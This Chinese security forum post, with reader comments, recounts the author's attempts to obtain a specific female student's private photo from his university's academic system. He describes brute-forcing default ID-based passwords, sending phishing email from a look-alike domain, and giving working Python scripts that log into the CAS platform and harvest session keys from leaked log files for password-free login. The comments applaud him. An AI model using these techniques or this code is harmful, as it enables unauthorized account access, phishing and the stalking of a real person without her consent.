用户
搜索
  • TA的每日心情

    2018-10-9 20:12
  • 签到天数: 185 天

    连续签到: 1 天

    [LV.7]常住居民III

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    9

    主题

    112

    帖子

    1783

    魔法币
    收听
    3
    粉丝
    9
    注册时间
    2016-8-21

    i春秋签约作者春秋文阁

    发表于 2018-3-6 15:52:25 83339364
    本帖最后由 hlpureboy 于 2018-3-8 21:58 编辑

    套路用尽只为拿到妹子纯素颜照

    此文面向初学者,当入门的同学。文中若有错误之处,请在评论处指正

    故事伊始,原来一次好友推荐,像我这么高(men)冷(sao)的人,特别想知道加我的小姐姐长什么样?而然,我翻遍QQ空间、朋友圈、微博、知乎等一系列社交网站之后,还是没找到公开的照片,怎么办呢?

    转念一想,教务处肯定有照片,下面说一下自己的思路


    1.学校旧系统的统一认证平台存在爆破

    虽然这个漏洞很久以前就提交了,但老师一直没有修复。我校同学们一般不用统一认证平台,密码默认身份证后六位,通过统一认证平台登录教务处。记得图书馆存在弱口令,可以查看个人身份证,但是,这个洞被修复了。上burpsuite爆破了。像这样

    1

    2

    但是我这边网络质量不怎么样,极容易出现  403

    那么此路不通!

    2.邮件钓鱼来一发

    记得以前分享过,类似的例子..

    https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=24372

    考虑到以前写的东西都太零碎了,这次我把它写成了一个框架,代码放在了github上。

    地址: https://github.com/hlpureboy/PYphishing-Email

    记得给个star呀!

    以前的伪造邮件的时候都会出现有什么什么代发,这次我直接用了注册了一个相似的域名!

    域名为:xxx.tech ,刚开始打算自己打一个邮箱服务器,结果,总是被误报成垃圾邮件,觉得一些相关的协议没有配置成功,有配置过的师傅教教我!随后用个一个腾讯免费的企业邮箱,才能发送邮件。

    企业邮箱

    生成一个带有教务处的邮箱.

    企业邮箱

    配置一下相关参数smtp发信,在腾讯的帮助文档里有说明,非常简单,在这里就不赘述了!

    写一下相应的钓鱼邮件,搭建一个简单的钓鱼网站!

    emial_finish

    最终效果图如下

    end

    没有显示代发!静待妹子上钩!

    我这次用到的工具就是github那个,有什么不明白的可以再留言区问我!

    结果妹子根本有没上钩!我估计她是不看邮箱的!

    3.教务处老洞新玩法

    彪哥十分想搞学校教务处,前段时间在写教务处抢课,发现学校新版本的统一认证平台的url:

    http://xxx.xx.edu.cn/authserver/login?service=http://xx.xx.xx.xx/login_cas 登陆之后可以直接跳转到教务处 service后面跟的参数很有意思,后面跟的是教务处的url/login_cas,对新版本的url分析发现,

    最后出现一个url:http://xxx.xx.xx.xx/cas_verify.aspx?i=xxx&k=xxx  点击这个url免密登陆教务处

    写了一下自动登录统一认证平台的代码

    # encoding=utf-8
    import re
    import requests
    import sys
    from multiprocessing import Pool
    from multiprocessing.dummy import Pool as ThreadPool
    class login:
        def __init__(self,name):
            self.host="http://authserver.xxxx.edu.cn"
            self.url="http://authserver.xxx.edu.cn/authserver/login?service=http://xxx.xxx.x.x/login_cas.aspx"
            self.name=name
            self.jwc_url="http://xx.xxx.xx.xx/cas_verify.aspx?i={}&k={}"
            self.headers={
                'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
            }
            self.session=requests.session()
            self.data={
                "username":self.name,
                "password":"",
                "lt":"",
                "dllt":"userNamePasswordLogin",
                "execution":"e1s1",
                "_eventId":"submit",
                "rmShown":"1"
            }
        def paramhtml(self):
            html = self.session.get(self.url, headers=self.headers).content
            action = re.findall("action=.*x\"", html)[0]
            lt = re.findall("name=\"lt\" value=.*\"", html)[0]
            self.data["lt"] = lt.split("value")[1].split("\"")[1]
            self.post_url = self.host + action.split("\"")[1]
        def login(self,pwd):
            #print("pwd:%s" %pwd)
            self.data["password"]=pwd
            try:
                self.paramhtml()
                content = self.session.post(self.post_url, headers=self.headers, data=self.data).content
                k = re.findall("k=.*\"", content)[0]
                k = k.split("=")[1].split("\"")[0]
                #print(self.jwc_url.format(self.name, k))
                print(k)
                return k,self.jwc_url.format(self.name, k)
            except Exception,e:
                print(e.message)
                return '',''
    if __name__ == '__main__':
    
        print(login("xxxxxx").login("xxxxx"))

    还记得教务处的log敏感信息泄露么?虽然账号密码看不到了,但是从统一认证平台跳到教务处网站的记录还是存在的,C段一下,发现几个教务处的网站存在log记录,用新版统一认证平台的去构造一个新的url,在借着写教务处抢课的名义让小姐姐试试能不能登陆?登陆成功之后,在检查log记录,岂不美哉?他喵的聊天记录没了。不过key我去保存了下来!直接登录!我就不放照片了,我觉得她会把我砍了!

    下面有重点!
    写了个demo,多线程的自己改就成了!url是学校教务处的地址

    
    # encoding=utf-8
    import re
    import requests
    import datetime
    KEYS=set()
    def check_log(url,date=datetime.date.today()):
        url_log="{}/log/{}-log.txt".format(url,date)
        r=requests.get(url_log,stream=True)
        if r.status_code!=200:
            print "[+] no logs in the site"
            return
        print("[+]log url:{}".format(url_log))
        for content in r.iter_content(chunk_size=1024):
            keys = re.findall("cas_verify.aspx\?i=[0-9]+&k=[0-9,a-b,A-Z]+", content)
            #print keys
            for i in keys:
                KEYS.add(i)
        if len(KEYS)==0:
            print("[+]keys not in this log!")
        else:
            f=open("./"+url.split("//")[-1]+".txt","a")
            print("[+]keys has been foud:")
            for i in KEYS:
                print("[+] url:"+url+"/"+i)
                f.write(url+"/"+i+"\n")
            f.close()
    def all_log_check(url):
        date = datetime.datetime(datetime.datetime.now().year, 01, 01)
        while (date - datetime.datetime.today()).days <= 0:
            try:
                check_log(url,date=date.strftime("%Y-%m-%d"))
            except Exception,e:
                print(e.message)
            date = date + datetime.timedelta(days=1)


    我知道你们想像中的样子是这样的

    u=2076727592,2040020576&amp;fm=27&amp;gp=0.jpg

    实际上是这样的

    游客,如果您要查看本帖隐藏内容请回复




    我什么都不服1,我就服你这种人,虽然我是个网络新手,但是阻挡不了我对你们这种人的崇拜,老铁,我会向你靠拢,等着我。一直在学习,从没中断过,骗子也hao,什么也阻挡不了我们这群游走在黑暗中的一只手,老铁,我顶你。我会超越你
    使用道具 评分 举报
    使用道具 举报 回复
    我什么都不服1,我就服你这种人,虽然我是个网络新手,但是阻挡不了我对你们这种人的崇拜,老铁,我会向你靠拢,等着我。一直在学习,从没中断过,骗子也hao,什么也阻挡不了我们这群游走在黑暗中的一只手,老铁,我顶你。我会超越你
    使用道具 举报 回复
    我什么都不服1,我就服你这种人,虽然我是个网络新手,但是阻挡不了我对你们这种人的崇拜,老铁,我会向你靠拢,等着我。一直在学习,从没中断过,骗子也hao,什么也阻挡不了我们这群游走在黑暗中的一只手,老铁,我顶你。我会超越你
    使用道具 举报 回复
    发表于 2018-10-11 15:55:40
    我什么都不服1,我就服你这种人,虽然我是个网络新手,但是阻挡不了我对你们这种人的崇拜,老铁,我会向你靠拢,等着我。一直在学习,从没中断过,骗子也hao,什么也阻挡不了我们这群游走在黑暗中的一只手,老铁,我顶你。我会超越你
    使用道具 举报 回复
    我什么都不服1,我就服你这种人,虽然我是个网络新手,但是阻挡不了我对你们这种人的崇拜,老铁,我会向你靠拢,等着我。一直在学习,从没中断过,骗子也hao,什么也阻挡不了我们这群游走在黑暗中的一只手,老铁,我顶你。我会超越你
    使用道具 举报 回复
    我什么都不服1,我就服你这种人,虽然我是个网络新手,但是阻挡不了我对你们这种人的崇拜,老铁,我会向你靠拢,等着我。一直在学习,从没中断过,骗子也hao,什么也阻挡不了我们这群游走在黑暗中的一只手,老铁,我顶你。我会超越你
    使用道具 举报 回复

    我什么都不服1,我就服你这种人,虽然我是个网络新手,但是阻挡不了我对你们这种人的崇拜,老铁,我会向你靠拢,等着我。一直在学习,从没中断过,骗子也hao,什么也阻挡不了我们这群游走在黑暗中的一只手,老铁,我顶你。我会超越你
    使用道具 举报 回复
    我什么都不服1,我就服你这种人,虽然我是个网络新手,但是阻挡不了我对你们这种人的崇拜,老铁,我会向你靠拢,等着我。一直在学习,从没中断过,骗子也hao,什么也阻挡不了我们这群游走在黑暗中的一只手,老铁,我顶你。我会超越你
    使用道具 举报 回复
    我还以为能有眼福,结果我看到分析过程!emmmm我的确有眼福
    使用道具 举报 回复
    发表于 2018-3-6 17:53:33
    流觞曲水月 发表于 2018-3-6 16:17
    我还以为能有眼福,结果我看到分析过程!emmmm我的确有眼福

    大兄弟满足你
    使用道具 举报 回复

    emmmmmm,谢谢你给我买的橘子
    使用道具 举报 回复
    发表于 2018-3-6 18:13:06
    任意显!任意显!有没有这个
    不努力,拿什么养活你女人
    使用道具 举报 回复
    发表于 2018-3-6 18:29:16
    楼主666666
    使用道具 举报 回复
    好奇心迫使我回复
    使用道具 举报 回复
    666666666666666
    使用道具 举报 回复
    [斜眼笑]
    使用道具 举报 回复
    555555555555555555555555555555
    使用道具 举报 回复
    发表于 2018-3-6 19:21:30
    66666666666666666666666
    使用道具 举报 回复
    发表于 2018-3-6 19:28:44
    我知道你们想像中的样子是这样的
    使用道具 举报 回复
    发表于 2018-3-6 19:39:16
    真刺激!!
    使用道具 举报 回复
    哈哈哈哈
    使用道具 举报 回复
    想看想看
    使用道具 举报 回复
    您需要登录后才可以回帖 登录 | 立即注册